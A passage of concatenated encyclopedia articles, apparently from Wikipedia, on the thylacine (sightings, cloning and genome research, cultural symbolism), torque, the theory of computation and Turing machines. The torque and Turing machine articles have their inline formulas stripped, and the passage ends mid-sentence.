July 1936, 59 days before the last known specimen died in captivity. Searches and unconfirmed sightings Between 1967 and 1973, zoologist Jeremy Griffith and dairy farmer James Malley conducted what is regarded as the most intensive search for thylacines ever carried out, including exhaustive surveys along Tasmania's west coast, installation of automatic camera stations, prompt investigations of claimed sightings, and in 1972 the creation of the Thylacine Expeditionary Research Team with Dr. Bob Brown, which concluded without finding any evidence of the thylacine's existence. The Department of Conservation and Land Management recorded 203 reports of sightings of the thylacine in Western Australia from 1936 to 1998. On the mainland, sightings are most frequently reported in Southern Victoria. According to the Department of Primary Industries, Parks, Water and Environment, there have been eight unconfirmed thylacine sighting reports between 2016 and 2019, with the latest unconfirmed visual sighting on 25 February 2018. Since the disappearance and effective extinction of the thylacine, speculation and searches for a living specimen have become a topic of interest to some members of the cryptozoology subculture. The search for the animal has been the subject of books and articles, with many reported sightings that are largely regarded as dubious. A 2023 study published by Brook et al. compiles many of the alleged sightings of thylacines in Tasmania throughout the 20th century and claims that, contrary to beliefs that the thylacine went extinct in the 1930s, the Tasmanian thylacine may have actually lasted throughout the 20th century, with a window of extinction between the 1980s and the present day and the likely extinction date being between the late 1990s and early 2000s. In 1983, the American media mogul Ted Turner offered a $100,000 reward for proof of the continued existence of the thylacine. In March 2005, Australian news magazine The Bulletin, as part of its 125th anniversary celebrations, offered a $1.25 million reward for the safe capture of a live thylacine. When the offer closed at the end of June 2005, no one had produced any evidence of the animal's existence. An offer of $1.75 million has subsequently been offered by a Tasmanian tour operator, Stewart Malcolm. Research Research into thylacines relies heavily on specimens held in museums and other institutions across the world. The number and distribution of these specimens has been recorded in the International Thylacine Specimen Database. As of 2022, 756 specimens are held in 115 museums and university collections in 23 countries. In 2017, a reference library of 159 micrographic images of thylacine hair was jointly produced by CSIRO and Where Light Meets Dark. Possible revival The Australian Museum in Sydney began a cloning project in 1999. The goal was to use genetic material from specimens taken and preserved in the early 20th century to clone new individuals and restore the species from extinction. Several molecular biologists dismissed the project as a public relations stunt. In late 2002, the researchers had some success as they were able to extract replicable DNA from the specimens. On 15 February 2005, the museum announced that it was stopping the project. In May 2005, the project was restarted by a group of interested universities and a research institute. In August 2022, it was announced that the University of Melbourne would partner with Texas-based biotechnology company Colossal Biosciences to attempt to re-create the thylacine using its closest living relative, the fat-tailed dunnart, and return it to Tasmania. The university had recently sequenced the genome of a juvenile thylacine specimen and was establishing a thylacine genetic restoration laboratory. The research from the University of Melbourne was led by Andrew Pask. The project was regarded with scepticism by other, uninvolved scientists. DNA sequencing A draft whole genome sequencing of the thylacine was produced by Feigin et al. (2017) using the DNA extracted from an ethanol-preserved pouch of a young specimen provided by Museums Victoria. The neonatal development of the thylacine was also reconstructed from preserved pouch young specimens from several museum collections. Researchers used the genome to study aspects of the thylacine's evolution and natural history, including the genetic basis of its convergence with canids, clarifying its evolutionary relationships with other marsupials and examining changes in its population size over time. The genomic basis of the convergent evolution between the thylacine and grey wolf was further investigated in 2019, with researchers identifying many non-coding genomic regions displaying accelerated rates of evolution, a test for genetic regions evolving under positive selection. In 2021, researchers further identified a link between the convergent skull shapes of the thylacine and wolf, and the previously identified genetic candidates. It was reported that specific groups of skull bones, which develop from a common population of stem cells called neural crest cells, showed strong similarity between the thylacine and wolf and corresponded with the underlying convergent genetic candidates which influence these cells during development. In 2023, RNA was extracted from a 130-year-old thylacine specimen in Sweden; this represented the first time RNA has been extracted from an extinct species. In October 2024, a 99.9% thylacine genome was sequenced from a well-preserved skull that is estimated to be 110-year-old, allowing for the full genome of the species to be sequenced three months later. Cultural significance Official usage The thylacine has been used extensively as a symbol of Tasmania. The animal is featured on the official Tasmanian coat of arms. It is used in the official logos for the Tasmanian government and the City of Launceston. It is also used on the University of Tasmania's ceremonial mace and the badge of the submarine . Since 1998, it has been prominently displayed on Tasmanian vehicle number plates. The thylacine has appeared in postage stamps from Australia, Equatorial Guinea, and Micronesia. Since 1996, 7 September (the date in 1936 on which the last known thylacine died) has been commemorated in Australia as National Threatened Species Day. In popular culture The thylacine has become a cultural icon in Australia. The best known illustrations of Thylacinus cynocephalus were those in John Gould's The Mammals of Australia (1845–1863), often copied since its publication and the most frequently reproduced, and given further exposure by Cascade Brewery's appropriation for its label in 1987. The government of Tasmania published a monochromatic reproduction of the same image in 1934, the author Louisa Anne Meredith also copied it for Tasmanian Friends and Foes (1881). The thylacine is the mascot for the Tasmanian cricket team. A series of postage stamps that feature Mickey Mouse characters with Australian animals features a thylacine stamp in the collection. In video games, boomerang-wielding Ty the Tasmanian Tiger is the star of his own trilogy during the 2000s. Tiny Tiger, a villain in the popular Crash Bandicoot video game series, is a mutated thylacine. In Valorant, agent Skye has the ability to use a Tasmanian tiger to scout enemies and clear bomb-planting sites. The animal has made appearance in film and television. Characters in the early 1990s' cartoon Taz-Mania included the neurotic Wendell T. Wolf, the last surviving Tasmanian wolf. The Hunter is a 2011 Australian drama film, based on the 1999 novel of the same name by Julia Leigh. It stars Willem Dafoe, who plays a man hired to track down the Tasmanian tiger. In the 2021 film, Extinct, a thylacine named Burnie, along with a group of other extinct animals, help the movie's main characters travel through time to rescue their species from extinction. In the 2022 science-fiction show The Peripheral the Tasmanian tiger is brought back into existence from DNA extracts. An animated web series titled "De-extincting Tasie" meant to explain the revival of the species by Colossal Biosciences and University of Melbourne features a thylacine named Tasie, a satire of the Mr. DNA character from the Jurassic Park media franchise. In Aboriginal tradition Rock art featuring Thylacine-like animals are found throughout Northern Australia, particularly in the Kimberley region. Various Aboriginal Tasmanian names for the thylacine have been recorded, such as coorinna, kanunnah, cab-berr-one-nen-er, loarinna, laoonana, can-nen-ner and lagunta, while kaparunina is used in Palawa kani. One Nuenonne myth recorded by Jackson Cotton tells of a thylacine pup saving Palana, a spirit boy, from an attack by a giant kangaroo. Palana marked the pup's back with ochre as a mark of its bravery, giving thylacines their stripes. A constellation, "Wurrawana Corinna" (identified as within or near Gemini), was also created as a commemoration of this mythic act of bravery. An early European record tells how Aboriginals believed bad weather was caused by a Thylacine carcass being left exposed on the ground, instead of being covered by a small shelter.
Biology and health sciences
Marsupials
Animals
30400
https://en.wikipedia.org/wiki/Torque
Torque
In physics and mechanics, torque is the rotational analogue of linear force. It is also referred to as the moment of force (also abbreviated to moment). The symbol for torque is typically , the lowercase Greek letter tau. When being referred to as moment of force, it is commonly denoted by . Just as a linear force is a push or a pull applied to a body, a torque can be thought of as a twist applied to an object with respect to a chosen point; for example, driving a screw uses torque to force it into an object, which is applied by the screwdriver rotating around its axis to the drives on the head. History The term torque (from Latin , 'to twist') is said to have been suggested by James Thomson and appeared in print in April, 1884. Usage is attested the same year by Silvanus P. Thompson in the first edition of Dynamo-Electric Machinery. Thompson motivates the term as follows: Today, torque is referred to using different vocabulary depending on geographical location and field of study. This article follows the definition used in US physics in its usage of the word torque. In the UK and in US mechanical engineering, torque is referred to as moment of force, usually shortened to moment. This terminology can be traced back to at least 1811 in Siméon Denis Poisson's . An English translation of Poisson's work appears in 1842. Definition and relation to other physical quantities A force applied perpendicularly to a lever multiplied by its distance from the lever's fulcrum (the length of the lever arm) is its torque. Therefore, torque is defined as the product of the magnitude of the perpendicular component of the force and the distance of the line of action of a force from the point around which it is being determined. In three dimensions, the torque is a pseudovector; for point particles, it is given by the cross product of the displacement vector and the force vector. The direction of the torque can be determined by using the right hand grip rule: if the fingers of the right hand are curled from the direction of the lever arm to the direction of the force, then the thumb points in the direction of the torque. It follows that the torque vector is perpendicular to both the position and force vectors and defines the plane in which the two vectors lie. The resulting torque vector direction is determined by the right-hand rule. Therefore any force directed parallel to the particle's position vector does not produce a torque. The magnitude of torque applied to a rigid body depends on three quantities: the force applied, the lever arm vector connecting the point about which the torque is being measured to the point of force application, and the angle between the force and lever arm vectors. In symbols: where is the torque vector and is the magnitude of the torque, is the position vector (a vector from the point about which the torque is being measured to the point where the force is applied), and r is the magnitude of the position vector, is the force vector, F is the magnitude of the force vector and F⊥ is the amount of force directed perpendicularly to the position of the particle, denotes the cross product, which produces a vector that is perpendicular both to and to following the right-hand rule, is the angle between the force vector and the lever arm vector. The SI unit for torque is the newton-metre (N⋅m). For more on the units of torque, see . Relationship with the angular momentum The net torque on a body determines the rate of change of the body's angular momentum, where L is the angular momentum vector and t is time. For the motion of a point particle, where is the moment of inertia and ω is the orbital angular velocity pseudovector. It follows that using the derivative of a vector isThis equation is the rotational analogue of Newton's second law for point particles, and is valid for any type of trajectory. In some simple cases like a rotating disc, where only the moment of inertia on rotating axis is, the rotational Newton's second law can bewhere . Proof of the equivalence of definitions The definition of angular momentum for a single point particle is: where p is the particle's linear momentum and r is the position vector from the origin. The time-derivative of this is: This result can easily be proven by splitting the vectors into components and applying the product rule. But because the rate of change of linear momentum is force and the rate of change of position is velocity , The cross product of momentum with its associated velocity is zero because velocity and momentum are parallel, so the second term vanishes. Therefore, torque on a particle is equal to the first derivative of its angular momentum with respect to time. If multiple forces are applied, according Newton's second law it follows that This is a general proof for point particles, but it can be generalized to a system of point particles by applying the above proof to each of the point particles and then summing over all the point particles. Similarly, the proof can be generalized to a continuous mass by applying the above proof to each point within the mass, and then integrating over the entire mass. Derivatives of torque In physics, rotatum is the derivative of torque with respect to timewhere τ is torque. This word is derived from the Latin word meaning 'to rotate', but the term rotatum is not universally recognized but is commonly used. There is not a universally accepted lexicon to indicate the successive derivatives of rotatum, even if sometimes various proposals have been made. Using the cross product definition of torque, an alternative expression for rotatum is: Because the rate of change of force is yank and the rate of change of position is velocity , the expression can be further simplified to: Relationship with power and energy The law of conservation of energy can also be used to understand torque. If a force is allowed to act through a distance, it is doing mechanical work. Similarly, if torque is allowed to act through an angular displacement, it is doing work. Mathematically, for rotation about a fixed axis through the center of mass, the work W can be expressed as where τ is torque, and θ1 and θ2 represent (respectively) the initial and final angular positions of the body. It follows from the work–energy principle that W also represents the change in the rotational kinetic energy Er of the body, given by where I is the moment of inertia of the body and ω is its angular speed. Power is the work per unit time, given by where P is power, τ is torque, ω is the angular velocity, and represents the scalar product. Algebraically, the equation may be rearranged to compute torque for a given angular speed and power output. The power injected by the torque depends only on the instantaneous angular speed – not on whether the angular speed increases, decreases, or remains constant while the torque is being applied (this is equivalent to the linear case where the power injected by a force depends only on the instantaneous speed – not on the resulting acceleration, if any). Proof The work done by a variable force acting over a finite linear displacement is given by integrating the force with respect to an elemental linear displacement However, the infinitesimal linear displacement is related to a corresponding angular displacement and the radius vector as Substitution in the above expression for work, , gives The expression inside the integral is a scalar triple product , but as per the definition of torque, and since the parameter of integration has been changed from linear displacement to angular displacement, the equation becomes If the torque and the angular displacement are in the same direction, then the scalar product reduces to a product of magnitudes; i.e., giving Principle of moments The principle of moments, also known as Varignon's theorem (not to be confused with the geometrical theorem of the same name) states that the resultant torques due to several forces applied to about a point is equal to the sum of the contributing torques: From this it follows that the torques resulting from N number of forces acting around a pivot on an object are balanced when Units Torque has the dimension of force times distance, symbolically and those fundamental dimensions are the same as that for energy or work. Official SI literature indicates newton-metre, is properly denoted N⋅m, as the unit for torque; although this is dimensionally equivalent to the joule, which is not used for torque. In the case of torque, the unit is assigned to a vector, whereas for energy, it is assigned to a scalar. This means that the dimensional equivalence of the newton-metre and the joule may be applied in the former but not in the latter case. This problem is addressed in orientational analysis, which treats the radian as a base unit rather than as a dimensionless unit. The traditional imperial units for torque are the pound foot (lbf-ft), or, for small values, the pound inch (lbf-in). In the US, torque is most commonly referred to as the foot-pound (denoted as either lb-ft or ft-lb) and the inch-pound (denoted as in-lb). Practitioners depend on context and the hyphen in the abbreviation to know that these refer to torque and not to energy or moment of mass (as the symbolism ft-lb would properly imply). Conversion to other units A conversion factor may be necessary when using different units of power or torque. For example, if rotational speed (unit: revolution per minute or second) is used in place of angular speed (unit: radian per second), we must multiply by 2 radians per revolution. In the following formulas, P is power, τ is torque, and ν (Greek letter nu) is rotational speed. Showing units: Dividing by 60 seconds per minute gives us the following. where rotational speed is in revolutions per minute (rpm, rev/min). Some people (e.g., American automotive engineers) use horsepower (mechanical) for power, foot-pounds (lbf⋅ft) for torque and rpm for rotational speed. This results in the formula changing to: The constant below (in foot-pounds per minute) changes with the definition of the horsepower; for example, using metric horsepower, it becomes approximately 32,550. The use of other units (e.g., BTU per hour for power) would require a different custom conversion factor. Derivation For a rotating object, the linear distance covered at the circumference of rotation is the product of the radius with the angle covered. That is: linear distance = radius × angular distance. And by definition, linear distance = linear speed × time = radius × angular speed × time. By the definition of torque: torque = radius × force. We can rearrange this to determine force = torque ÷ radius. These two values can be substituted into the definition of power: The radius r and time t have dropped out of the equation. However, angular speed must be in radians per unit of time, by the assumed direct relationship between linear speed and angular speed at the beginning of the derivation. If the rotational speed is measured in revolutions per unit of time, the linear speed and distance are increased proportionately by 2 in the above derivation to give: If torque is in newton-metres and rotational speed in revolutions per second, the above equation gives power in newton-metres per second or watts. If Imperial units are used, and if torque is in pounds-force feet and rotational speed in revolutions per minute, the above equation gives power in foot pounds-force per minute. The horsepower form of the equation is then derived by applying the conversion factor 33,000 ft⋅lbf/min per horsepower: because Special cases and other facts Moment arm formula A very useful special case, often given as the definition of torque in fields other than physics, is as follows: The construction of the "moment arm" is shown in the figure to the right, along with the vectors r and F mentioned above. The problem with this definition is that it does not give the direction of the torque but only the magnitude, and hence it is difficult to use in three-dimensional cases. If the force is perpendicular to the displacement vector r, the moment arm will be equal to the distance to the centre, and torque will be a maximum for the given force. The equation for the magnitude of a torque, arising from a perpendicular force: For example, if a person places a force of 10 N at the terminal end of a wrench that is 0.5 m long (or a force of 10 N acting 0.5 m from the twist point of a wrench of any length), the torque will be 5 N⋅m – assuming that the person moves the wrench by applying force in the plane of movement and perpendicular to the wrench. Static equilibrium For an object to be in static equilibrium, not only must the sum of the forces be zero, but also the sum of the torques (moments) about any point. For a two-dimensional situation with horizontal and vertical forces, the sum of the forces requirement is two equations: and , and the torque a third equation: . That is, to solve statically determinate equilibrium problems in two-dimensions, three equations are used. Net force versus torque When the net force on the system is zero, the torque measured from any point in space is the same. For example, the torque on a current-carrying loop in a uniform magnetic field is the same regardless of the point of reference. If the net force is not zero, and is the torque measured from , then the torque measured from is Machine torque Torque forms part of the basic specification of an engine: the power output of an engine is expressed as its torque multiplied by the angular speed of the drive shaft. Internal-combustion engines produce useful torque only over a limited range of rotational speeds (typically from around 1,000–6,000 rpm for a small car). One can measure the varying torque output over that range with a dynamometer, and show it as a torque curve. Steam engines and electric motors tend to produce maximum torque close to zero rpm, with the torque diminishing as rotational speed rises (due to increasing friction and other constraints). Reciprocating steam-engines and electric motors can start heavy loads from zero rpm without a clutch. In practice, the relationship between power and torque can be observed in bicycles: Bicycles are typically composed of two road wheels, front and rear gears (referred to as sprockets) meshing with a chain, and a derailleur mechanism if the bicycle's transmission system allows multiple gear ratios to be used (i.e. multi-speed bicycle), all of which attached to the frame. A cyclist, the person who rides the bicycle, provides the input power by turning pedals, thereby cranking the front sprocket (commonly referred to as chainring). The input power provided by the cyclist is equal to the product of angular speed (i.e. the number of pedal revolutions per minute times 2π) and the torque at the spindle of the bicycle's crankset. The bicycle's drivetrain transmits the input power to the road wheel, which in turn conveys the received power to the road as the output power of the bicycle. Depending on the gear ratio of the bicycle, a (torque, angular speed)input pair is converted to a (torque, angular speed)output pair. By using a larger rear gear, or by switching to a lower gear in multi-speed bicycles, angular speed of the road wheels is decreased while the torque is increased, product of which (i.e. power) does not change. Torque multiplier Torque can be multiplied via three methods: by locating the fulcrum such that the length of a lever is increased; by using a longer lever; or by the use of a speed-reducing gearset or gear box. Such a mechanism multiplies torque, as rotation rate is reduced.
Physical sciences
Classical mechanics
null
30402
https://en.wikipedia.org/wiki/Theory%20of%20computation
Theory of computation
In theoretical computer science and mathematics, the theory of computation is the branch that deals with what problems can be solved on a model of computation, using an algorithm, how efficiently they can be solved or to what degree (e.g., approximate solutions versus precise ones). The field is divided into three major branches: automata theory and formal languages, computability theory, and computational complexity theory, which are linked by the question: "What are the fundamental capabilities and limitations of computers?". In order to perform a rigorous study of computation, computer scientists work with a mathematical abstraction of computers called a model of computation. There are several models in use, but the most commonly examined is the Turing machine. Computer scientists study the Turing machine because it is simple to formulate, can be analyzed and used to prove results, and because it represents what many consider the most powerful possible "reasonable" model of computation (see Church–Turing thesis). It might seem that the potentially infinite memory capacity is an unrealizable attribute, but any decidable problem solved by a Turing machine will always require only a finite amount of memory. So in principle, any problem that can be solved (decided) by a Turing machine can be solved by a computer that has a finite amount of memory. History The theory of computation can be considered the creation of models of all kinds in the field of computer science. Therefore, mathematics and logic are used. In the last century, it separated from mathematics and became an independent academic discipline with its own conferences such as FOCS in 1960 and STOC in 1969, and its own awards such as the IMU Abacus Medal (established in 1981 as the Rolf Nevanlinna Prize), the Gödel Prize, established in 1993, and the Knuth Prize, established in 1996. Some pioneers of the theory of computation were Ramon Llull, Alonzo Church, Kurt Gödel, Alan Turing, Stephen Kleene, Rózsa Péter, John von Neumann and Claude Shannon. Branches Automata theory Automata theory is the study of abstract machines (or more appropriately, abstract 'mathematical' machines or systems) and the computational problems that can be solved using these machines. These abstract machines are called automata. Automata comes from the Greek word (Αυτόματα) which means that something is doing something by itself. Automata theory is also closely related to formal language theory, as the automata are often classified by the class of formal languages they are able to recognize. An automaton can be a finite representation of a formal language that may be an infinite set. Automata are used as theoretical models for computing machines, and are used for proofs about computability. Formal Language theory Language theory is a branch of mathematics concerned with describing languages as a set of operations over an alphabet. It is closely linked with automata theory, as automata are used to generate and recognize formal languages. There are several classes of formal languages, each allowing more complex language specification than the one before it, i.e. Chomsky hierarchy, and each corresponding to a class of automata which recognizes it. Because automata are used as models for computation, formal languages are the preferred mode of specification for any problem that must be computed. Computability theory Computability theory deals primarily with the question of the extent to which a problem is solvable on a computer. The statement that the halting problem cannot be solved by a Turing machine is one of the most important results in computability theory, as it is an example of a concrete problem that is both easy to formulate and impossible to solve using a Turing machine. Much of computability theory builds on the halting problem result. Another important step in computability theory was Rice's theorem, which states that for all non-trivial properties of partial functions, it is undecidable whether a Turing machine computes a partial function with that property. Computability theory is closely related to the branch of mathematical logic called recursion theory, which removes the restriction of studying only models of computation which are reducible to the Turing model. Many mathematicians and computational theorists who study recursion theory will refer to it as computability theory. Computational complexity theory Complexity theory considers not only whether a problem can be solved at all on a computer, but also how efficiently the problem can be solved. Two major aspects are considered: time complexity and space complexity, which are respectively how many steps it takes to perform a computation, and how much memory is required to perform that computation. In order to analyze how much time and space a given algorithm requires, computer scientists express the time or space required to solve the problem as a function of the size of the input problem. For example, finding a particular number in a long list of numbers becomes harder as the list of numbers grows larger. If we say there are n numbers in the list, then if the list is not sorted or indexed in any way we may have to look at every number in order to find the number we're seeking. We thus say that in order to solve this problem, the computer needs to perform a number of steps that grow linearly in the size of the problem. To simplify this problem, computer scientists have adopted Big O notation, which allows functions to be compared in a way that ensures that particular aspects of a machine's construction do not need to be considered, but rather only the asymptotic behavior as problems become large. So in our previous example, we might say that the problem requires steps to solve. Perhaps the most important open problem in all of computer science is the question of whether a certain broad class of problems denoted NP can be solved efficiently. This is discussed further at Complexity classes P and NP, and P versus NP problem is one of the seven Millennium Prize Problems stated by the Clay Mathematics Institute in 2000. The Official Problem Description was given by Turing Award winner Stephen Cook. Models of computation Aside from a Turing machine, other equivalent (See: Church–Turing thesis) models of computation are in use. Lambda calculus A computation consists of an initial lambda expression (or two if you want to separate the function and its input) plus a finite sequence of lambda terms, each deduced from the preceding term by one application of Beta reduction. Combinatory logic is a concept which has many similarities to -calculus, but also important differences exist (e.g. fixed point combinator Y has normal form in combinatory logic but not in -calculus). Combinatory logic was developed with great ambitions: understanding the nature of paradoxes, making foundations of mathematics more economic (conceptually), eliminating the notion of variables (thus clarifying their role in mathematics). μ-recursive functions a computation consists of a mu-recursive function, i.e. its defining sequence, any input value(s) and a sequence of recursive functions appearing in the defining sequence with inputs and outputs. Thus, if in the defining sequence of a recursive function the functions and appear, then terms of the form 'g(5)=7' or 'h(3,2)=10' might appear. Each entry in this sequence needs to be an application of a basic function or follow from the entries above by using composition, primitive recursion or μ recursion. For instance if , then for 'f(5)=3' to appear, terms like 'g(5)=6' and 'h(5,6)=3' must occur above. The computation terminates only if the final term gives the value of the recursive function applied to the inputs. Markov algorithm a string rewriting system that uses grammar-like rules to operate on strings of symbols. Register machine is a theoretically interesting idealization of a computer. There are several variants. In most of them, each register can hold a natural number (of unlimited size), and the instructions are simple (and few in number), e.g. only decrementation (combined with conditional jump) and incrementation exist (and halting). The lack of the infinite (or dynamically growing) external store (seen at Turing machines) can be understood by replacing its role with Gödel numbering techniques: the fact that each register holds a natural number allows the possibility of representing a complicated thing (e.g. a sequence, or a matrix etc.) by an appropriately huge natural number — unambiguity of both representation and interpretation can be established by number theoretical foundations of these techniques. In addition to the general computational models, some simpler computational models are useful for special, restricted applications. Regular expressions, for example, specify string patterns in many contexts, from office productivity software to programming languages. Another formalism mathematically equivalent to regular expressions, finite automata are used in circuit design and in some kinds of problem-solving. Context-free grammars specify programming language syntax. Non-deterministic pushdown automata are another formalism equivalent to context-free grammars. Primitive recursive functions are a defined subclass of the recursive functions. Different models of computation have the ability to do different tasks. One way to measure the power of a computational model is to study the class of formal languages that the model can generate; in such a way to the Chomsky hierarchy of languages is obtained.
Mathematics
Discrete mathematics
null
30403
https://en.wikipedia.org/wiki/Turing%20machine
Turing machine
A Turing machine is a mathematical model of computation describing an abstract machine that manipulates symbols on a strip of tape according to a table of rules. Despite the model's simplicity, it is capable of implementing any computer algorithm. The machine operates on an infinite memory tape divided into discrete cells, each of which can hold a single symbol drawn from a finite set of symbols called the alphabet of the machine. It has a "head" that, at any point in the machine's operation, is positioned over one of these cells, and a "state" selected from a finite set of states. At each step of its operation, the head reads the symbol in its cell. Then, based on the symbol and the machine's own present state, the machine writes a symbol into the same cell, and moves the head one step to the left or the right, or halts the computation. The choice of which replacement symbol to write, which direction to move the head, and whether to halt is based on a finite table that specifies what to do for each combination of the current state and the symbol that is read. As with a real computer program, it is possible for a Turing machine to go into an infinite loop which will never halt. The Turing machine was invented in 1936 by Alan Turing, who called it an "a-machine" (automatic machine). It was Turing's doctoral advisor, Alonzo Church, who later coined the term "Turing machine" in a review. With this model, Turing was able to answer two questions in the negative: Does a machine exist that can determine whether any arbitrary machine on its tape is "circular" (e.g., freezes, or fails to continue its computational task)? Does a machine exist that can determine whether any arbitrary machine on its tape ever prints a given symbol? Thus by providing a mathematical description of a very simple device capable of arbitrary computations, he was able to prove properties of computation in general—and in particular, the uncomputability of the Entscheidungsproblem, or 'decision problem' (whether every mathematical statement is provable or disprovable). Turing machines proved the existence of fundamental limitations on the power of mechanical computation. While they can express arbitrary computations, their minimalist design makes them too slow for computation in practice: real-world computers are based on different designs that, unlike Turing machines, use random-access memory. Turing completeness is the ability for a computational model or a system of instructions to simulate a Turing machine. A programming language that is Turing complete is theoretically capable of expressing all tasks accomplishable by computers; nearly all programming languages are Turing complete if the limitations of finite memory are ignored. Overview A Turing machine is an idealised model of a central processing unit (CPU) that controls all data manipulation done by a computer, with the canonical machine using sequential memory to store data. Typically, the sequential memory is represented as a tape of infinite length on which the machine can perform read and write operations. In the context of formal language theory, a Turing machine (automaton) is capable of enumerating some arbitrary subset of valid strings of an alphabet. A set of strings which can be enumerated in this manner is called a recursively enumerable language. The Turing machine can equivalently be defined as a model that recognises valid input strings, rather than enumerating output strings. Given a Turing machine M and an arbitrary string s, it is generally not possible to decide whether M will eventually produce s. This is due to the fact that the halting problem is unsolvable, which has major implications for the theoretical limits of computing. The Turing machine is capable of processing an unrestricted grammar, which further implies that it is capable of robustly evaluating first-order logic in an infinite number of ways. This is famously demonstrated through lambda calculus. A Turing machine that is able to simulate any other Turing machine is called a universal Turing machine (UTM, or simply a universal machine). Another mathematical formalism, lambda calculus, with a similar "universal" nature was introduced by Alonzo Church. Church's work intertwined with Turing's to form the basis for the Church–Turing thesis. This thesis states that Turing machines, lambda calculus, and other similar formalisms of computation do indeed capture the informal notion of effective methods in logic and mathematics and thus provide a model through which one can reason about an algorithm or "mechanical procedure" in a mathematically precise way without being tied to any particular formalism. Studying the abstract properties of Turing machines has yielded many insights into computer science, computability theory, and complexity theory. Physical description In his 1948 essay, "Intelligent Machinery", Turing wrote that his machine consists of: Description The Turing machine mathematically models a machine that mechanically operates on a tape. On this tape are symbols, which the machine can read and write, one at a time, using a tape head. Operation is fully determined by a finite set of elementary instructions such as "in state 42, if the symbol seen is 0, write a 1; if the symbol seen is 1, change into state 17; in state 17, if the symbol seen is 0, write a 1 and change to state 6;" etc. In the original article ("On Computable Numbers, with an Application to the Entscheidungsproblem", see also references below), Turing imagines not a mechanism, but a person whom he calls the "computer", who executes these deterministic mechanical rules slavishly (or as Turing puts it, "in a desultory manner"). More explicitly, a Turing machine consists of: A tape divided into cells, one next to the other. Each cell contains a symbol from some finite alphabet. The alphabet contains a special blank symbol (here written as '0') and one or more other symbols. The tape is assumed to be arbitrarily extendable to the left and to the right, so that the Turing machine is always supplied with as much tape as it needs for its computation. Cells that have not been written before are assumed to be filled with the blank symbol. In some models the tape has a left end marked with a special symbol; the tape extends or is indefinitely extensible to the right. A head that can read and write symbols on the tape and move the tape left and right one (and only one) cell at a time. In some models the head moves and the tape is stationary. A state register that stores the state of the Turing machine, one of finitely many. Among these is the special start state with which the state register is initialised. These states, writes Turing, replace the "state of mind" a person performing computations would ordinarily be in. A finite table of instructions that, given the state(qi) the machine is currently in and the symbol(aj) it is reading on the tape (the symbol currently under the head), tells the machine to do the following in sequence (for the 5-tuple models): Either erase or write a symbol (replacing aj with aj1). Move the head (which is described by dk and can have values: 'L' for one step left or 'R' for one step right or 'N' for staying in the same place). Assume the same or a new state as prescribed (go to state qi1). In the 4-tuple models, erasing or writing a symbol (aj1) and moving the head left or right (dk) are specified as separate instructions. The table tells the machine to (ia) erase or write a symbol or (ib) move the head left or right, and then (ii) assume the same or a new state as prescribed, but not both actions (ia) and (ib) in the same instruction. In some models, if there is no entry in the table for the current combination of symbol and state, then the machine will halt; other models require all entries to be filled. Every part of the machine (i.e. its state, symbol-collections, and used tape at any given time) and its actions (such as printing, erasing and tape motion) is finite, discrete and distinguishable; it is the unlimited amount of tape and runtime that gives it an unbounded amount of storage space. Formal definition Following , a (one-tape) Turing machine can be formally defined as a 7-tuple where is a finite, non-empty set of tape alphabet symbols; is the blank symbol (the only symbol allowed to occur on the tape infinitely often at any step during the computation); is the set of input symbols, that is, the set of symbols allowed to appear in the initial tape contents; is a finite, non-empty set of states; is the initial state; is the set of final states or accepting states. The initial tape contents is said to be accepted by if it eventually halts in a state from . is a partial function called the transition function, where L is left shift, R is right shift. If is not defined on the current state and the current tape symbol, then the machine halts; intuitively, the transition function specifies the next state transited from the current state, which symbol to overwrite the current symbol pointed by the head, and the next head movement. A variant allows "no shift", say N, as a third element of the set of directions . The 7-tuple for the 3-state busy beaver looks like this (see more about this busy beaver at Turing machine examples): (states); (tape alphabet symbols); (blank symbol); (input symbols); (initial state); (final states); see state-table below (transition function). Initially all tape cells are marked with . Additional details required to visualise or implement Turing machines In the words of van Emde Boas (1990), p. 6: "The set-theoretical object [his formal seven-tuple description similar to the above] provides only partial information on how the machine will behave and what its computations will look like." For instance, There will need to be many decisions on what the symbols actually look like, and a failproof way of reading and writing symbols indefinitely. The shift left and shift right operations may shift the tape head across the tape, but when actually building a Turing machine it is more practical to make the tape slide back and forth under the head instead. The tape can be finite, and automatically extended with blanks as needed (which is closest to the mathematical definition), but it is more common to think of it as stretching infinitely at one or both ends and being pre-filled with blanks except on the explicitly given finite fragment the tape head is on (this is, of course, not implementable in practice). The tape cannot be fixed in length, since that would not correspond to the given definition and would seriously limit the range of computations the machine can perform to those of a linear bounded automaton if the tape was proportional to the input size, or finite-state machine if it was strictly fixed-length. Alternative definitions Definitions in literature sometimes differ slightly, to make arguments or proofs easier or clearer, but this is always done in such a way that the resulting machine has the same computational power. For example, the set could be changed from to , where N ("None" or "No-operation") would allow the machine to stay on the same tape cell instead of moving left or right. This would not increase the machine's computational power. The most common convention represents each "Turing instruction" in a "Turing table" by one of nine 5-tuples, per the convention of Turing/Davis (Turing (1936) in The Undecidable, p. 126–127 and Davis (2000) p. 152): (definition 1): (qi, Sj, Sk/E/N, L/R/N, qm) ( current state qi , symbol scanned Sj , print symbol Sk/erase E/none N , move_tape_one_square left L/right R/none N , new state qm ) Other authors (Minsky (1967) p. 119, Hopcroft and Ullman (1979) p. 158, Stone (1972) p. 9) adopt a different convention, with new state qm listed immediately after the scanned symbol Sj: (definition 2): (qi, Sj, qm, Sk/E/N, L/R/N) ( current state qi , symbol scanned Sj , new state qm , print symbol Sk/erase E/none N , move_tape_one_square left L/right R/none N ) For the remainder of this article "definition 1" (the Turing/Davis convention) will be used. In the following table, Turing's original model allowed only the first three lines that he called N1, N2, N3 (cf. Turing in The Undecidable, p. 126). He allowed for erasure of the "scanned square" by naming a 0th symbol S0 = "erase" or "blank", etc. However, he did not allow for non-printing, so every instruction-line includes "print symbol Sk" or "erase" (cf. footnote 12 in Post (1947), The Undecidable, p. 300). The abbreviations are Turing's (The Undecidable, p. 119). Subsequent to Turing's original paper in 1936–1937, machine-models have allowed all nine possible types of five-tuples: Any Turing table (list of instructions) can be constructed from the above nine 5-tuples. For technical reasons, the three non-printing or "N" instructions (4, 5, 6) can usually be dispensed with. For examples see Turing machine examples. Less frequently the use of 4-tuples are encountered: these represent a further atomization of the Turing instructions (cf. Post (1947), Boolos & Jeffrey (1974, 1999), Davis-Sigal-Weyuker (1994)); also see more at Post–Turing machine. The "state" The word "state" used in context of Turing machines can be a source of confusion, as it can mean two things. Most commentators after Turing have used "state" to mean the name/designator of the current instruction to be performed—i.e. the contents of the state register. But Turing (1936) made a strong distinction between a record of what he called the machine's "m-configuration", and the machine's (or person's) "state of progress" through the computation—the current state of the total system. What Turing called 